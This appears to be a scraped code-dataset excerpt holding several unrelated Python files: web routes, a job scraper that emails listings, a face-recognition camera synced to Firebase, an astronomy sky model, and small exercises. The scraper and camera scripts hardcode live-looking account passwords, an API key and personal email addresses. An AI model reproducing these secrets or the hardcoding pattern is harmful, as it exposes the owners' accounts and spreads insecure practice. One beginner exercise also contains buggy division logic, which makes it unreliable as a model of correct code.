methods=['POST'])\n@cross_origin(origin='*')\ndef add():\n id = request.form.get('id')\n text = request.form.get('text')\n meta_data = request.form.get('meta_data')\n corpus_id = request.form.get('corpus_id')\n document = documentService.save(id, text, meta_data, corpus_id)\n\n return document.serialized\n\n\n@documents.route('//edit', methods=['PUT'])\n@cross_origin(origin='*')\ndef edit(id):\n text = request.form.get('text')\n status = request.form.get('status')\n corpus_id = request.form.get('corpus_id')\n document = documentService.edit(id, text, status, corpus_id)\n\n return document.serialized\n\n\n@documents.route('//delete', methods=['DELETE'])\n@cross_origin(origin='*')\ndef delete(id):\n document = documentService.delete(id)\n\n return document.serialize\n\n\n@documents.route('//validate', methods=['PUT'])\n@cross_origin(origin='*')\ndef validate(id):\n document = documentService.validate(id)\n\n return document.serialized\n","repo_name":"ivanandreski/food-wiz-kiii","sub_path":"backend/app/web/document_routes.py","file_name":"document_routes.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"926262528","text":"import requests\nimport smtplib\nfrom http import HTTPStatus\nfrom bs4 import BeautifulSoup as BS\nimport robots\nURL = 'https://www.jpsc.gov.in'\n\n\ndef find_jpsc_jobs():\n jobs_list = []\n res = requests.get(URL)\n if res.status_code == HTTPStatus.OK:\n soup = BS(res.content, 'lxml')\n # latest_job = soup.find_all('ul', attrs={'id': 'ulid'})\n latest_job = soup.select('#ulid li')\n for jobs in latest_job:\n jobs_list.append([jobs.text.replace('\\n', ''), URL + '/' + jobs.find('a').get('href')])\n\n jobs = '\\n'.join([str(job) for job in jobs_list ])\n print(jobs)\n send_mail(jobs)\n\n\ndef send_mail(message):\n gmail_user = 'deepakjon31@gmail.com'\n gmail_password = 'Devi12345@'\n\n sent_from = gmail_user\n # to = ['siteshkumar536@gmail.com', 'pappu095@gmail.com']\n to = ['sahoosurabhi@gmail.com']\n subject = 'JPSC lates Jobs'\n body = 'Hi,\\n\\n Please find below JPSC jobs and do apply :) \\n\\n' + message + \\\n '\\n\\n Thanks,\\n Deepak\\n\\nThis is System generated mail, Have a good day and Enjoy!!!'\n\n email_text = \"\"\"\\\n From: %s\n To: %s\n Subject: %s\n \n %s\n \"\"\" % (sent_from, \", \".join(to), subject, body)\n\n try:\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(gmail_user, gmail_password)\n server.sendmail(sent_from, to, email_text)\n server.quit()\n print('Email sent!')\n except Exception as e:\n print('Something went wrong...', e)\n\n\nif __name__ == '__main__':\n # if robots.check('/ebooks/', 'http://www.google.com'):\n if robots.check(URL):\n find_jpsc_jobs()\n # print(\"Deepak\")\n else:\n print(\"kumar\")\n # find_jpsc_jobs()","repo_name":"deepakjon31/dataScientist","sub_path":"scrape/jpsc_jobs.py","file_name":"jpsc_jobs.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31264558566","text":"#!/usr/bin/python3\n\nfrom math import sqrt\n\n\nclass PathSegment():\n def __init__(self, x1, y1, x2, y2):\n self.x1 = x1\n self.y1 = y1\n self.x2 = x2\n self.y2 = y2\n self.dx = x2 - x1\n self.dy = y2 - y1\n\n self.calculateStandard()\n self.length = self.getDistance(x1, y1, x2, y2)\n\n def calculateStandard(self):\n \"\"\"\n Calculate the standard form for the line segment \n (i.e. ax + by + c = 0)\n \"\"\"\n self.a = self.y1 - self.y2\n self.b = self.x2 - self.x1\n self.c = -(self.a * self.x1 + self.b * self.y1)\n\n @staticmethod\n def getDistance(x1, y1, x2, y2):\n \"\"\"\n Calculate the distance between two points\n \"\"\"\n return sqrt((x2 - x1)**2 + (y2 - y1)**2)\n\n def dotProduct(self, x, y):\n \"\"\"\n Calculate the dot product of vectors (x-x1, y-y1) and (x2-x1, y2-y1)\n \"\"\"\n dx = x - self.x1\n dy = y - self.y1\n return self.dx * dx + self.dy * dy\n\n def findClosestPoint(self, xv, yv):\n \"\"\"\n Find point on path segment closest to vehicle\n https://en.wikipedia.org/wiki/Distance_from_a_point_to_a_line\n \"\"\"\n den = self.a**2 + self.b**2\n x = (self.b * (self.b * xv - self.a * yv) - self.a * self.c) / den\n y = (self.a * (-self.b * xv + self.a * yv) - self.b * self.c) / den\n\n # Calculate the percentage completed of the segment\n index = self.dotProduct(x, y) / (self.length**2)\n\n return (x, y, index)\n\n def findCircleIntersection(self, x, y, radius):\n \"\"\"\n Find intersection between path segment and a circle. \n (x, y) = closest point on path to vehicle, \n radius = lookahead distance\n http://mathworld.wolfram.com/Circle-LineIntersection.html\n \"\"\"\n x1 = self.x1 - x\n y1 = self.y1 - y\n x2 = self.x2 - x\n y2 = self.y2 - y\n dx = x2 - x1\n dy = y2 - y1\n dr2 = dx * dx + dy * dy\n det = x1 * y2 - x2 * y1\n\n discrim = dr2 * radius * radius - det * det\n if (discrim >= 0):\n sqrtDiscrim = sqrt(discrim)\n sign = -1 if (dy < 0) else 1\n\n posX = (det * dy + sign * dx * sqrtDiscrim) / dr2 + x\n posY = (-det * dx + abs(dy) * sqrtDiscrim) / dr2 + y\n negX = (det * dy - sign * dx * sqrtDiscrim) / dr2 + x\n negY = (-det * dx - abs(dy) * sqrtDiscrim) / dr2 + y\n\n posDot = self.dotProduct(posX, posY)\n negDot = self.dotProduct(negX, negY)\n\n # Return the point on the segment closest to the end\n if (posDot < 0 and negDot >= 0):\n return (negX, negY)\n elif (posDot >= 0 and negDot < 0):\n return (posX, posY)\n else:\n dPos = PathSegment.getDistance(self.x2, self.y2, posX, posY)\n dNeg = PathSegment.getDistance(self.x2, self.y2, negX, negY)\n if (dPos < dNeg):\n return (posX, posY)\n else:\n return (negX, negY)\n\n else:\n return (None, None)\n","repo_name":"maxwellpettit/PythonRobot","sub_path":"src/pursuit/pathSegment.py","file_name":"pathSegment.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"2664209483","text":"# Samuel Schwarcz\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport signal\nfrom IPython import display\nfrom skimage.transform import resize\nfrom threading import Thread\nimport face_recognition\nimport shutil\nimport os\nfrom termcolor import colored #not important\nimport dlib\nfrom imutils.video import VideoStream\nfrom imutils import face_utils\nimport pyrebase\n\n\nconfig = {\n \"apiKey\": \"AIzaSyCJOFIBO5g-ZVBNlebfldboRuEYQC-KSRo\",\n \"authDomain\": \"smartcity-187de.firebaseapp.com\",\n \"databaseURL\": \"https://smartcity-187de.firebaseio.com\",\n \"storageBucket\": \"smartcity-187de.appspot.com\",\n \"serviceAccount\": \"C:/Users/Dell/Desktop/smartcity.json\"\n}\n\nfirebase = pyrebase.initialize_app(config)\nauth = firebase.auth()\n#authenticate a user\nuser = auth.sign_in_with_email_and_password(\"eladha190@gmail.com\", \"12345678\")\nstorage = firebase.storage()\ndb = firebase.database()\n\npredictor_path = r'C:\\Users\\Dell\\Desktop\\projetFinal\\Models\\shape_predictor_68_face_landmarks1.dat'\ntest_directory=r'C:\\Users\\Dell\\Desktop\\DirExit'\n\nclass Index():\n indexImg = 0\n indexDir = 1\n indexPhotog = 0\n\n cam = None\n faces = None\n frame = None\n\n\n\nclass Camera(Thread):####################################CAMERA\n\n def __init__(self,cam ,faces,frame):\n Thread.__init__(self)\n self.frame=frame\n self.faces=faces\n self.cam=cam\n self.n_img_per_person=1\n\n\n def getNewPicture(self):\n self.frame =Index.frame\n self.cam=Index.cam\n self.faces=Index.faces\n pass\n\n def moveImage(self,path):\n os.rename('C:\\\\Users\\\\Dell\\\\Desktop\\\\DirPers\\\\'+path,test_directory+'\\\\'+path)\n pass\n\n def PrintPicture(self, photo, cam,x ,y ,w ,h):\n\n frame = cam.read() ## to save the frame\n crop_img = frame[y:y + h, x:x + w] ##crop the picture\n img = crop_img\n\n try:\n aligned = cv2.resize(img, (320, 430)) ## resize the picture\n except Exception:\n print(colored(\"problem with the resize\",'green'))\n self.getNewPicture()\n self.run()\n return\n\n self.deletePers(aligned)\n pass\n\n\n def deletePers(self,picture): # verifie la distplot et efface le photo\n\n\n image_dir_basepath = 'C:\\\\Users\\\\Dell\\\\Desktop\\\\DirPers\\\\'\n list = os.listdir(image_dir_basepath)\n\n exit_man_image = picture\n exit_man_encodings = face_recognition.face_encodings(exit_man_image)\n if len(exit_man_encodings) > 0:\n exit_man_encoding = exit_man_encodings[0]\n else:\n print(colored(\"problem with the exit-picture encoding\", 'green'))\n self.getNewPicture()\n self.run()\n return True\n\n for namePic in list:\n\n search_image = face_recognition.load_image_file(image_dir_basepath + namePic + '\\\\image0.jpg')\n\n search_encodings = face_recognition.face_encodings(search_image)\n if len(search_encodings) > 0:\n search_encoding = search_encodings[0]\n else:\n print(colored(\"problem with the search encoding\\npicture moved\", 'green'))\n self.moveImage(namePic)\n continue\n\n results = face_recognition.compare_faces([exit_man_encoding], search_encoding)#compare les visages\n print(results)\n if (results[0] == True):\n\n try:\n storage.delete(\"images/\" + namePic + \".jpg\")\n except Exception:\n print(colored(\"problem with the STORAGE delete\",'green'))\n\n try:\n db.child(\"person\").child(namePic).remove(user['idToken'])\n except Exception:\n print(colored(\"problem with the DATABASE delete\",'green'))\n\n\n\n\n theDeletPic = image_dir_basepath + namePic\n print(\"will delete \"+theDeletPic)\n shutil.rmtree(theDeletPic)#efface les photos\n\n print(\"as efface\")\n return\n print(\"NOT FOUND\")\n\n pass\n\n def run(\n self): ########################################################################################################\n\n print(\"2-Camera found new face!\")\n frame = self.frame\n\n for face in self.faces:\n photo = PhotoIndexes()\n i = 0\n\n while not i == self.n_img_per_person: # 10 pictures have been taken\n (x, y, w, h) = face_utils.rect_to_bb(face)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n self.PrintPicture(photo, self.cam, x - 20, y - 80, w + 40, h + 120)\n i += 1 # number of picture for each man (=1)\n\n Index.indexImg = 0\n display.clear_output(wait=True)\n\n print(\"sorti\")\n\n\n\n\nclass PhotoIndexes():\n synchronyzed = 1\n\n def __init__(self):\n Thread.__init__(self)\n\n self.created = False # boolean for not duplicate mkdir\n self.no=Index.indexPhotog\n Index.indexPhotog+=1\n self.pathDir = \"\"\n self.nameImgDIR = \"\"\n\n\nclass FaceDemo(object):###############la camera dans le vide\n def __init__(self, cascade_path):\n self.vc = None\n self.predictor = cascade_path\n self.margin = 10\n self.batch_size = 1\n self.n_img_per_person = 10\n self.is_interrupted = False\n self.data = {}\n\n\n def _signal_handler(self, signal, frame):\n self.is_interrupted = True\n\n def capture_images(self , name='Unknown'):\n cam = VideoStream(1).start() #######################################################################################################\n#####################################################################################################################\n self.vc=cam\n\n\n\n\n\n fig = plt.figure(0)\n fig.canvas.set_window_title('כניסה')\n Index.NbFaces = 0\n detector = dlib.get_frontal_face_detector()#dlib\n predictor = dlib.shape_predictor(predictor_path)\n\n\n\n while True:\n\n frame = cam.read()\n # frame = imutils.resize(frame, width=400)\n Index.cam=cam\n gray = frame\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)##give a normal color to the camera\n # faces = detector(gray, 0)\n faces = detector(gray, 0)\n\n Index.faces = faces\n\n if len(faces)!=0:\n\n Index.frame=frame\n for face in faces:\n\n # explain face predictor\n shape = predictor(gray, face)\n shape = face_utils.shape_to_np(shape)\n for (x, y) in shape:##shape.length=68\n cv2.circle(frame, (x, y), 1, (0, 0, 255), -1)\n\n # (x, y, w, h) = face_utils.rect_to_bb(face)\n # cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n\n if len(faces) > Index.NbFaces:\n\n\n print('1-create new thread')\n\n thread1 = Camera(cam,faces,frame)\n thread1.start()\n\n\n cv2.imshow(\"Frame\",frame)\n # plt.title(\"Found {0} faces!\".format(len(faces)))\n # plt.xticks([])\n # plt.yticks([])\n # display.clear_output(wait=True)\n\n Index.NbFaces = len(faces)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n\n break\n\n cv2.destroyAllWindows()\n cam.stop()\n\n\nprint(colored(\"start\",'blue'))\nf = FaceDemo(predictor_path)\nf.capture_images('ENTER')\n","repo_name":"sschwarcz/SmartCity","sub_path":"ExitCam.py","file_name":"ExitCam.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39886608523","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n__author__ = 'Administrator'\r\n__time__ = '2016/4/29'\r\n\"\"\"\r\nimport codecs\r\nfrom JsFormat import *\r\nfrom Log import *\r\nfrom AnlyConfigFile import *\r\n\r\n\r\ndef WtToFile(fp, num, data):\r\n assert isinstance(fp, basestring)\r\n assert isinstance(data, list)\r\n assert isinstance(num, int)\r\n if not data:\r\n return 0\r\n n = 0\r\n if os.path.exists(fp):\r\n os.unlink(fp)\r\n fw = codecs.open(fp, mode='w', encoding='utf-8')\r\n try:\r\n contPre = GetJsPreFix()\r\n fw.write(contPre)\r\n fw.write('=[')\r\n fw.write('\\n')\r\n for line in data:\r\n fw.write('\\t')\r\n v1 = line[0]\r\n v2 = line[1]\r\n line = '{\"name\":\"%s\",\"value\":%s}' % (v1, v2)\r\n fw.write(line)\r\n fw.write(',') if n < num-1 else 0\r\n n += 1\r\n fw.write('\\n')\r\n fw.write(']')\r\n return 1\r\n except Exception as we:\r\n Log('ERROR', 'WtToFile Occur Exception : %s' % we.message)\r\n return 0\r\n finally:\r\n fw.close()\r\n\r\n\r\n\r\n","repo_name":"GIS90/python_base_use","sub_path":"ETJ/Core/WtToFile.py","file_name":"WtToFile.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11677084249","text":"# Built-in modules\nimport numpy as np\nimport sys as sy\ntry:\n import h5py as hp\nexcept ImportError:\n sy.stderr(\n \"BoloCalc Import Error: h5py not installed.\\n\"\n \"As of BoloCalc v0.10.0, h5py is used to load ATM profiles\\n\"\n \"Use pip to install via 'pip install h5py'\\n\"\n \"Or, if using an Anaconda environment, 'conda install h5py'\\n\")\nimport os\n\n# BoloCalc modules\nimport src.foregrounds as fg\n\n\nclass Sky:\n \"\"\"\n Sky object contains the foregrounds and atmosphere\n added line\n\n Args:\n tel (src.Telescope): parent Telescope object\n\n Parents\n tel (src.Telescope): Telescope object\n \"\"\"\n def __init__(self, tel):\n # Store passed parameters\n self.tel = tel\n self._log = self.tel.exp.sim.log\n self._phys = self.tel.exp.sim.phys\n self._load = self.tel.exp.sim.load\n self._infg = self.tel.exp.sim.param(\"infg\")\n self._atm_file = self.tel.exp.sim.atm_file\n\n # Initialize foregrounds\n if self._infg:\n self._log.log(\"Initializing foregrounds in Sky object\")\n self._fg = fg.Foregrounds(self)\n else:\n self._fg = None\n # Maximum and minimum allowed PWV\n self._max_pwv = 8.0\n self._min_pwv = 0.0\n # Allowed site names\n self._allowed_sites = [\n \"ATACAMA\", \"POLE\", \"MCMURDO\", \"SPACE\", \"CUST\"]\n\n # ***** Public Methods ******\n def evaluate(self, sky_temp, pwv, elev, freqs):\n \"\"\"\n Generate the sky elements, absorbtivities, transmissions,\n and temperatures\n\n Args:\n pwv (float): PWV\n elev (float): elevation\n freqs (float): frequencies [Hz] at which to evlauate the sky\n \"\"\"\n site = self.tel.param(\"site\").upper()\n # Custom sky effective brightness temperature\n if sky_temp != \"NA\":\n Nsky = ['Sky' for f in freqs]\n Tsky = [sky_temp for f in freqs]\n Esky = [1. for f in freqs]\n Asky = [1. for f in freqs]\n return [[Nsky],\n [Asky],\n [Esky],\n [Tsky]]\n elif site in self._allowed_sites:\n # Check that an atmosphere exists\n if site != 'SPACE':\n Natm = ['ATM' for f in freqs]\n Tatm, Eatm = self._atm_spectrum(pwv, elev, freqs)[1:]\n Aatm = [1. for f in freqs]\n # Won't look at the atmosphere from space, probably\n else: # site = 'SPACE'\n pass # no atmosphere\n else: \n self._log.err(\n \"Could not understand site '%s' defined for telescope '%s'\\n\"\n \"Allowed options: %s, or a float.\" % (\n site.lower().capitalize(), self.tel.name,\n ', '.join(self._allowed_sites)))\n\n Ncmb = ['CMB' for f in freqs]\n Tcmb = [self._phys.Tcmb for f in freqs]\n Ecmb = [1. for f in freqs]\n Acmb = [1. for f in freqs]\n # Include foregrounds\n if self._infg:\n Nsyn = ['SYNC' for f in freqs]\n Tsyn = self._syn_temp(freqs)\n Esyn = [1. for f in freqs]\n Asyn = [1. for f in freqs]\n Ndst = ['DUST' for f in freqs]\n Tdst = self._dst_temp(freqs)\n Edst = [1. for f in freqs]\n Adst = [1. for f in freqs]\n if site != 'SPACE':\n return [[Ncmb, Nsyn, Ndst, Natm],\n [Acmb, Asyn, Adst, Aatm],\n [Ecmb, Esyn, Edst, Eatm],\n [Tcmb, Tsyn, Tdst, Tatm]]\n else:\n return [[Ncmb, Nsyn, Ndst],\n [Acmb, Asyn, Adst],\n [Ecmb, Esyn, Edst],\n [Tcmb, Tsyn, Tdst]]\n # Do not include foregrounds\n else:\n if site != 'SPACE':\n return [[Ncmb, Natm],\n [Acmb, Aatm],\n [Ecmb, Eatm],\n [Tcmb, Tatm]]\n else:\n return [[Ncmb],\n [Acmb],\n [Ecmb],\n [Tcmb]]\n\n def pwv_sample(self):\n \"\"\" Sample the PWV distribution \"\"\"\n samp = self.tel.pwv_sample()\n # Minimum allowed PWV is 0 mm\n if samp < self._min_pwv:\n self._log.log('Cannot have PWV %.1f < %.1f. Using %.1f instead'\n % (samp, self._min_pwv, self._min_pwv))\n return self._min_pwv\n # Maximum allowed PWV is 8 mm\n elif samp > self._max_pwv:\n self._log.log('Cannot have PWV %.1f > %.1f. Using %.1f instead'\n % (samp, self._max_pwv, self._max_pwv))\n return self._max_pwv\n else:\n return samp\n\n # ***** Helper Methods *****\n def _hdf5_select(self, pwv, elev):\n \"\"\" Retrieve ATM spectrum from HDF5 file \"\"\"\n # Two-level dictionary structure in the HDF5 file\n site = self.tel.param(\"site\").lower().capitalize()\n # McMurdo need camel casing\n if site == \"Mcmurdo\":\n site = \"McMurdo\"\n key = \"%d,%d\" % (pwv, elev)\n with hp.File(\"%s\" % (self._atm_file), \"r\") as hf:\n data = hf[site][key]\n freq = data[0]\n temp = data[2]\n tran = data[3]\n return (freq, tran, temp)\n\n def _atm_spectrum(self, pwv, elev, freqs):\n \"\"\" Atmosphere spectrum given a PWV and elevation \"\"\"\n GHz_to_Hz = 1.e+09\n m_to_mm = 1.e+03\n mm_to_um = 1.e+03\n # Load custom ATM file if present\n if self.tel.param(\"atm_file\") is not None:\n freq, tran, temp = self._load.atm(self.tel.param(\"atm_file\"))\n # Otherwise, select the atmosphere from the HDF5 file\n else:\n freq, tran, temp = self._hdf5_select(\n int(round(pwv * m_to_mm, 1) * mm_to_um),\n int(round(elev, 0)))\n # Massage arrays\n freq = (freq * GHz_to_Hz).flatten().tolist()\n temp = np.interp(freqs, freq, temp).flatten().tolist()\n tran = np.interp(freqs, freq, tran).flatten().tolist()\n return freq, temp, tran\n\n def _syn_temp(self, freqs):\n \"\"\" Synchrotron physical temperature spectrum \"\"\"\n return self._fg.sync_temp(freqs)\n\n def _dst_temp(self, freqs):\n \"\"\" Dust spectrum \"\"\"\n return self._fg.dust_temp(freqs)\n","repo_name":"chill90/BoloCalc","sub_path":"src/sky.py","file_name":"sky.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"38168397841","text":"def collect(lst, item):\n if item not in lst:\n lst.append(item)\n return lst\n\n\ndef drop(lst, item):\n if item in lst:\n lst.remove(item)\n return lst\n\n\ndef combine(lst, command):\n temporary_lst = command.split(':')\n if temporary_lst[0] in lst:\n lst.insert(lst.index(temporary_lst[0]) + 1, temporary_lst[1])\n return lst\n\n\ndef renew(lst, item):\n if item in lst:\n lst.remove(item)\n lst.append(item)\n return lst\n\n\njournal_lst = input().split(', ')\n\nwhile True:\n prompt_lst = input().split(' - ')\n if prompt_lst[0] == 'Craft!':\n break\n elif prompt_lst[0] == 'Collect':\n journal_lst = collect(journal_lst, prompt_lst[1])\n elif prompt_lst[0] == 'Drop':\n journal_lst = drop(journal_lst, prompt_lst[1])\n elif prompt_lst[0] == 'Combine Items':\n journal_lst = combine(journal_lst, prompt_lst[1])\n elif prompt_lst[0] == 'Renew':\n journal_lst = renew(journal_lst, prompt_lst[1])\n\nprint(*journal_lst, sep=', ')\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Python Fundamentals May 2023/Midterm Exam Preparation/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40718426378","text":"from __future__ import absolute_import, unicode_literals\n\nimport os\n\nimport sentry_sdk\nfrom celery import Celery\nfrom sentry_sdk.integrations.celery import CeleryIntegration\n\nfrom concordia.version import get_concordia_version\n\nSENTRY_BACKEND_DSN = os.environ.get(\"SENTRY_BACKEND_DSN\", None)\n\nif SENTRY_BACKEND_DSN:\n CONCORDIA_ENVIRONMENT = os.environ.get(\"CONCORDIA_ENVIRONMENT\", None)\n sentry_sdk.init(\n SENTRY_BACKEND_DSN,\n environment=CONCORDIA_ENVIRONMENT,\n release=get_concordia_version(),\n integrations=[CeleryIntegration()],\n )\n\napp = Celery(\"concordia\")\n\n# Using a string here means the worker doesn't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\napp.config_from_object(\"django.conf:settings\", namespace=\"CELERY\")\n\n# Load task modules from all registered Django app configs.\napp.autodiscover_tasks()\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(\"Request: {0!r}\".format(self.request))\n","repo_name":"LibraryOfCongress/concordia","sub_path":"concordia/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"52"} +{"seq_id":"26869095787","text":"from typing import List\nfrom cgen.type import Type\nfrom cgen.statement import Statement\nfrom cgen.loop import loop_until, LOOP_ITERATOR\nfrom cgen.function import PRINTF\nfrom cgen.variable import Variable\nfrom cgen.literal import Literal\nfrom cgen.expression import Expression\nfrom cgen.type import INT\nfrom cgen.code import Code\n\n\nclass StructField:\n def __init__(self, data_type: Type, name):\n self.data_type = data_type\n self.name = name\n\n\nclass Struct(Type):\n def __init__(self, name: str, fields: List[StructField]):\n super().__init__(name, is_struct=True)\n self.fields = fields\n\n def define(self):\n fields_body = '\\n'.join([f' {p.data_type.render()} {p.name};' for p in self.fields])\n ret = f'struct {self.name} {{\\n'\n ret += fields_body\n ret += '\\n};'\n return Statement(ret)\n\n def print_formatted(self, var: Variable, size: Expression):\n literal_map = {\n INT: \"%d\"\n }\n\n with Code() as body:\n PRINTF.call(\n Literal(';'.join([f'{field.name}: {literal_map[field.data_type]}' for field in self.fields]) + '\\\\n'),\n *[var.at(LOOP_ITERATOR).field(field.name) for field in self.fields]\n )\n\n loop_until(size, body)\n\n # var = Variable()\n # PRINTF.call(Literal('%d\\\\n'), var_child_output.at(Literal(0)).field('Col2'))\n","repo_name":"tokoko/substrait-ml","sub_path":"cgen/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34985573694","text":"#!/usr/bin/python3\n\"\"\"script that prints the State object with\nthe name passed as argument from the database hbtn_0e_6_usa\"\"\"\n\nfrom model_state import Base, State\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import sessionmaker\nimport sqlalchemy\nfrom sys import argv\n\nif __name__ == \"__main__\":\n Base = declarative_base()\n Session = sessionmaker()\n enginestr = 'mysql+mysqldb://'\n engine = sqlalchemy.create_engine(\n \"{}{}:{}{}/{}\".format(enginestr, argv[1], argv[2],\n '@localhost:3306', argv[3]))\n Session.configure(bind=engine)\n session = Session()\n instances = session.query(State).filter(\n State.name == argv[4]).order_by(State.id).all()\n if instances:\n for instance in instances:\n print(\"{}\".format(instance.id))\n else:\n print(\"Not found\")\n","repo_name":"trevor-ofarrell/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25394954361","text":"#exercicios_cap5_pag88\n\n#ex5.6 Altere o programa para exibir os resultados no mesmo formato de uma tabuada : 2x1=2...\nn = int(input(\"tabuada de: \"))\nx = 1\nwhile x <=10:\n r =(n*x)\n x=x+1\n print(f\"{n} x {x-1} = {r}\")\n\n#ex5.7 modifique o programa anterior de forma que o usuario tambpem digite o inicio e o fim da tabuada em vez de começar com 1 e 10.\nn = int(input(\"tabuada de: \"))\ninicio = int(input(\"De: \"))\nfim = int(input(\"Até: \"))\nx = inicio\nwhile x <= fim:\n print(f\"{n} x {x} = {n*x}\")\n x=x+1\n\n#ex5.8 Escreva um programa que leia dois numeros. imprima o resultado da multiplicação do primeiro pelo segundo. Utilize apenas operadores de soma e subtração para calcular o resultado. Lembre-se de que podemos entender a multiplicação de dois numeros como a soma sucessiva de um deles. assim: 4x2 = 2 + 2 + 2 + 2.\nn1 = int(input(\"digite o primeiro numero: \"))\nn2 = int(input(\"digite o segundo numero: \"))\nx = 1\nr = 0\nwhile x <= n2:\n r = r + n1\n x = x + 1\nprint(f\"{n1} x {n2} = {r}\")\n\n#ex5.9 escreva um prog que leia dois numeros. imprima a divisão inteira do primeiro pelo segundo, assim com oo resto da divisão. utilize apenas os operadores de soma e subtração para calcular o resultado.\nn1 = int(input(\"digite o primeir numero: \"))\nn2 = int(input(\"digite o segundo numero: \"))\nquociente = 0\nx = n1\nif n2 <= 0:\n print(\"da matemática não existe divisão por zero, escolha outro numero: \")\nelse:\n while x >= n1:\n x = x - n2\n quociente = quociente + 1\n resto = x\n print(f\"{n1}/{n2} = {quociente} (quociente) {r} (resto)\")\n \n \n \n\n","repo_name":"GaybsGimenez/python_exercises","sub_path":"cap5/exercicios_cap5_pag88.py","file_name":"exercicios_cap5_pag88.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44436928956","text":"# INPUT: -v \n# -d (defaults to short dataset)\n# -meth (defaults to mean vector of word embeddings)\n\n# OUTPUT: npy of embedded tweets: embedded-datasets____/embedded_.npy\n\nimport os\nimport pickle\nfrom argparse import ArgumentParser\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.insert(1, os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) ) # little hack. https://stackoverflow.com/questions/4383571/importing-files-from-different-folder\nimport constants\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) # to fetch word-embeddings and write tweet-embeddings to the same dir as the embedding method (GLOVE)\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\"-v\", type=str, required=True, help=\"vocabulary (without path, without extension)\")\n parser.add_argument(\"-d\", choices=[\"train-short\", \"train-full\"], default=\"train-short\", help=\"training dataset (to choose which embedding to use)\")\n parser.add_argument(\"-meth\", choices=[\"mean\", \"raw\"], default=\"mean\")\n parser.add_argument(\"to_embed\", help=\"tweets to embed\", choices=[\"test_data\", \"train_neg_full\", \"train_neg\", \"train_pos_full\", \"train_pos\"])\n args = parser.parse_args()\n\n # create output dir if it doesn't exist yet\n outdir = os.path.join(CURRENT_DIR, f\"embedded-datasets__{args.d}__{args.v}__{args.meth}\")\n os.makedirs(outdir, exist_ok=True)\n\n with open(os.path.join(constants.DATASETS_PATH, f\"{args.to_embed}.txt\")) as f:\n tweets = f.readlines()\n\n ET = create_EmbedTweets(vocab_fn=args.v, dataset_fn=args.d, method=args.meth)\n \n # dummy_embedd_tw = ET.embed([\"hello\", \"world\"]) # to get the shape of the output\n # res = np.empty((len(tweets), *dummy_embedd_tw.shape))\n # for tweetnb, tweet in enumerate(tweets):\n # res[tweetnb] = ET.embed(tweet)\n res = np.array([ET.embed(tweet) for tweet in tweets])\n\n np.save(os.path.join(outdir, f\"embedded_{args.to_embed}.npy\"), res)\n\n\ndef create_EmbedTweets(vocab_fn, dataset_fn, method):\n \"\"\"A kind of \"factory\" function to create EmbedTweets from vocab and (training) dataset filenames\n Args: \n vocab_fn (string): vocabulary filename (without path, without extension)\n dataset_fn (\"train-short\" or \"train-full\"): training dataset\n method (\"mean\" or \"raw\"): method to use for embedding tweets\n \"\"\"\n # read vocabulary\n with open(os.path.join(constants.VOCABULARIES_CUT_PATH, f\"{vocab_fn}.pkl\"), \"rb\") as inputfile:\n vocab = pickle.load(inputfile)\n # read embedding\n with np.load(os.path.join(CURRENT_DIR,f\"embeddings__{dataset_fn}__{vocab_fn}.npz\")) as data:\n xs = data['xs']\n ys = data['ys']\n return EmbedTweets(vocab, xs, ys, method)\n\n\nclass EmbedTweets:\n \"\"\"Embed tweets into a vector using a word-embedding\n Attributes:\n word_to_index (dict {str: int}): inverse mapping of vocab\n xys (np.ndarray): concatenation of xs and ys with shape (VOCAB_SIZE, EMBEDDING_DIM)\n in some models we ignore the x/y separation and take the embedding of word i to be xys[i]=(xs[i],ys[i])\n VOCAB_SIZE (int)\n X_EMBEDDING_DIM (int)\n EMBEDDING_DIM (int)\n oov_vector (np.ndarray): fixed 